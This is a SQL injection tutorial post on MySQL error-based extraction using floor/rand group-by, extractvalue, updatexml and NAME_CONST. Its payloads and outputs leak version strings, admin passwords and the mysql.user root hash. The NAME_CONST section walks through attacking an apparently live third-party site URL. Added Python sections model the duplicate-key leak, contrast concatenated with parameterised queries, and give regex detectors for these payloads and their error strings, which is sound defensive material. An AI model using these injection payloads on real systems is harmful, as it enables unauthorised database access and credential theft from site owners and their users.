Three MySQL error-based injection methods: floor, ExtractValue and UpdateXml

Posted 2015-11-11 19:03:37 by the original poster

1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First, run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version has been leaked through the duplicate-key error. To retrieve other data, replace version() with the subquery you need.
For example, to retrieve the administrator username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

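Why the duplicate-key error carries the injected value: the Python model below is an added illustration by the editor, not code from the original post. It imitates how MySQL evaluates a GROUP BY whose key is non-deterministic: the key expression is evaluated once to look the group up and a second time when a new group is inserted, so the inserted key can collide with an existing one. The floor(rand(0)*2) values used are the commonly documented first outputs of that expression and are an assumption to confirm on your own server. The model also shows the caveat that at least three source rows are needed before the collision happens, which is why the second payload above builds a three-row derived table with union.

```python
# Added illustration (not from the original post): a model of how MySQL
# evaluates GROUP BY over a non-deterministic key, which is why
# concat(version(), floor(rand(0)*2)) ... group by x ends in ERROR 1062.
# The values below are the commonly documented first outputs of
# floor(rand(0)*2); treat them as an assumption and confirm on your server.
from typing import Dict, List, Optional

FLOOR_RAND0_TIMES_2 = [0, 1, 1, 0, 1, 1, 0, 0, 1]


class DuplicateEntry(Exception):
    """Stands in for MySQL ERROR 1062: Duplicate entry '...' for key 'group_key'."""

    def __init__(self, entry: str):
        super().__init__(f"Duplicate entry '{entry}' for key 'group_key'")
        self.entry = entry


def simulate_group_by(prefix: str, row_count: int,
                      rand_values: Optional[List[int]] = None) -> Dict[str, int]:
    """Model of SELECT count(*), concat(prefix, floor(rand(0)*2)) x ... GROUP BY x.

    MySQL looks the key up in a temporary table. When the key is absent it
    inserts a new group and, because the key expression is not deterministic,
    evaluates it a second time for that insert. If the second value collides
    with a group that already exists, the insert fails with a duplicate-key
    error whose message carries the key, i.e. the concatenated data.
    """
    values = iter(rand_values if rand_values is not None else FLOOR_RAND0_TIMES_2)
    groups: Dict[str, int] = {}
    for _ in range(row_count):
        lookup_key = f"{prefix}{next(values)}"      # first evaluation: lookup
        if lookup_key in groups:
            groups[lookup_key] += 1
            continue
        insert_key = f"{prefix}{next(values)}"      # second evaluation: insert
        if insert_key in groups:
            raise DuplicateEntry(insert_key)
        groups[insert_key] = 1
    return groups


def leaked_value(prefix: str, row_count: int) -> Optional[str]:
    """Return the string that would appear in the error message, or None if no error."""
    try:
        simulate_group_by(prefix, row_count)
    except DuplicateEntry as err:
        return err.entry
    return None


if __name__ == "__main__":
    for rows in (1, 2, 3):
        print(rows, "row(s):", leaked_value("5.1.33-community-log", rows))
```

With one or two rows the query completes normally; the third row performs a lookup for key "...0", misses, and then inserts under the re-evaluated key "...1", which already exists. The error text therefore quotes the prefix, which is whatever the injected subquery returned.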
2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

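The defensive counterpart to the three patterns above, as an added example that is not part of the original post: the string-concatenated query that makes `where id = 1 and extractvalue(...)` possible, next to the parameterised form, and a request handler that keeps the database error message out of the HTTP response (every technique on this page depends on that message being echoed back). The example uses Python's bundled sqlite3 so it runs offline; with a MySQL driver such as mysqlclient or mysql-connector the placeholder is %s rather than ?, which is assumed to be the only change. The article table, its single row, the handler and the sample payload are constructed for the example.

```python
# Added example (not from the original post): the vulnerable concatenation
# pattern beside the parameterised query, plus an error handler that logs the
# database error server-side and returns a generic message to the client.
# Uses sqlite3 so it runs offline; a MySQL driver uses %s instead of ?
# (assumption: nothing else in the pattern changes).
import logging
import sqlite3
from typing import List, Tuple

logging.basicConfig(level=logging.WARNING)
log = logging.getLogger("article")


def make_db() -> sqlite3.Connection:
    """Constructed sample data mirroring the post's `article` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT, content TEXT)")
    conn.execute("INSERT INTO article VALUES (1, 'test', 'do it')")
    return conn


def fetch_article_vulnerable(conn: sqlite3.Connection, raw_id: str) -> List[Tuple]:
    """String concatenation: whatever the client sends becomes part of the SQL."""
    sql = f"SELECT * FROM article WHERE id = {raw_id}"   # vulnerable on purpose
    return conn.execute(sql).fetchall()


def fetch_article_safe(conn: sqlite3.Connection, raw_id: str) -> List[Tuple]:
    """Parameterised query: the value is bound as data, never parsed as SQL."""
    return conn.execute("SELECT * FROM article WHERE id = ?", (raw_id,)).fetchall()


def handle_request(conn: sqlite3.Connection, raw_id: str, safe: bool = True) -> Tuple[int, str]:
    """Minimal request handler: never echo the database error to the client."""
    try:
        rows = fetch_article_safe(conn, raw_id) if safe else fetch_article_vulnerable(conn, raw_id)
    except sqlite3.Error as err:
        # Details stay in the server log; the client only sees a generic message.
        log.warning("database error for id=%r: %s", raw_id, err)
        return 500, "Internal error"
    if not rows:
        return 404, "Not found"
    return 200, str(rows[0])


# Constructed payload following the post's extractvalue pattern; sqlite3 has no
# extractvalue(), so the vulnerable path fails with a database error, which is
# exactly the signal an error-based injection relies on seeing in the response.
PAYLOAD = "1 and extractvalue(1, concat(0x5c, (select 'x')))"

if __name__ == "__main__":
    db = make_db()
    print("normal id, safe:      ", handle_request(db, "1"))
    print("payload, safe:        ", handle_request(db, PAYLOAD))
    print("payload, concatenated:", handle_request(db, PAYLOAD, safe=False))
```

In the parameterised path the whole payload is compared against the id column as one literal value, so the request simply finds nothing; in the concatenated path it is parsed as SQL and the engine error surfaces, but the handler turns it into a generic 500 instead of the raw message that the post's examples read the data out of.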


Further collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injecting via NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|------|
| TEST |
|------|
|   1  |
|------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'


Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'..

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
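Detection for all four error-based patterns on this page (floor/rand/group by, extractvalue, updatexml and the NAME_CONST duplicate-column trick), as an added example that is not part of the original post or the quoted tutorial: one function classifies request URLs taken from web-server access logs, another checks response bodies for the MySQL error strings shown in the output above (Duplicate entry ... for key 'group_key', XPATH syntax error, Duplicate column name). The log lines, hosts and paths are constructed; the signatures, and the key name <group_key> that newer MySQL versions print in place of group_key, are editorial assumptions to tune against your own traffic.

```python
# Added example (not from the original post): detection logic for the
# error-based injection patterns on this page, run over constructed
# access-log lines, plus a check for MySQL error text leaking into responses.
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Request-side signatures; the URL is URL-decoded, lower-cased and
# whitespace-collapsed before matching, so "+" and %20 encodings both match.
REQUEST_SIGNATURES = {
    "floor_group_by": re.compile(r"floor\s*\(\s*rand\s*\(.*?\)\s*\*\s*2\s*\).*group\s+by", re.S),
    "extractvalue":   re.compile(r"\bextractvalue\s*\("),
    "updatexml":      re.compile(r"\bupdatexml\s*\("),
    "name_const":     re.compile(r"\bname_const\s*\("),
}

# Response-side signatures: database error text that should never reach a client.
# '<group_key>' is the key name newer MySQL versions print (assumption).
LEAK_SIGNATURES = {
    "duplicate_entry":  re.compile(r"Duplicate entry '.*?' for key '(?:group_key|<group_key>)'"),
    "xpath_error":      re.compile(r"XPATH syntax error: '"),
    "duplicate_column": re.compile(r"Duplicate column name '"),
}


def normalise(query_string: str) -> str:
    """URL-decode ('+' becomes a space), lower-case and collapse whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(query_string)).lower()


def classify_request(url: str) -> List[str]:
    """Return the names of error-based injection signatures found in a URL."""
    text = normalise(url)
    return [name for name, rx in REQUEST_SIGNATURES.items() if rx.search(text)]


def classify_response(body: str) -> List[str]:
    """Return the names of leaked-error signatures found in a response body."""
    return [name for name, rx in LEAK_SIGNATURES.items() if rx.search(body)]


def scan_access_log(lines: List[str]) -> Dict[str, List[str]]:
    """Map each flagged request URL to the signatures it triggered."""
    hits: Dict[str, List[str]] = {}
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        found = classify_request(m.group(1))
        if found:
            hits[m.group(1)] = found
    return hits


# Constructed sample log lines (Apache combined format); hosts and paths are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Nov/2015:19:03:37 +0800] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [11/Nov/2015:19:04:02 +0800] "GET /article.php?id=1+and+extractvalue(1,concat(0x5c,version())) HTTP/1.1" 500 211',
    '10.0.0.9 - - [11/Nov/2015:19:04:15 +0800] "GET /article.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 230',
    '10.0.0.9 - - [11/Nov/2015:19:04:40 +0800] "GET /article.php?id=1+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 198',
]

if __name__ == "__main__":
    for url, names in scan_access_log(SAMPLE_LOG).items():
        print(names, url)
    print(classify_response("ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'"))
```

The request-side check is cheap enough to run in a WAF rule or a log pipeline; the response-side check is the more important control, because a 500 that contains raw database error text is what turns a syntax error into a data leak, regardless of which function the request used.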
